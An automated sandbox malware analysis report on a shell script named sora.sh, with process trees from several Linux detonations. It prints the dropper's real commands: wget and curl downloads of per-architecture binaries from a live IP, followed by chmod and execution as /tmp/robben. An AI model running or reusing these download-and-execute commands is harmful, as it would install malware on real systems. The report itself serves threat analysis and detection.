Malware Analysis Report

2025-01-23 15:17

Sample ID 240822-1rgc2azdkg
Target sora.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file sora.sh was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:52

Signatures

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:30

Platform

debian9-mipsel-20240418-en

Max time kernel

265s

Max time network

266s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:30

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

111s

Max time network

481s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
US 158.51.127.106:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.98:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.97:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

96s

Max time network

479s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.48:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.18:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:20

Platform

debian12-armhf-20240221-en

Max time kernel

45s

Max time network

605s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

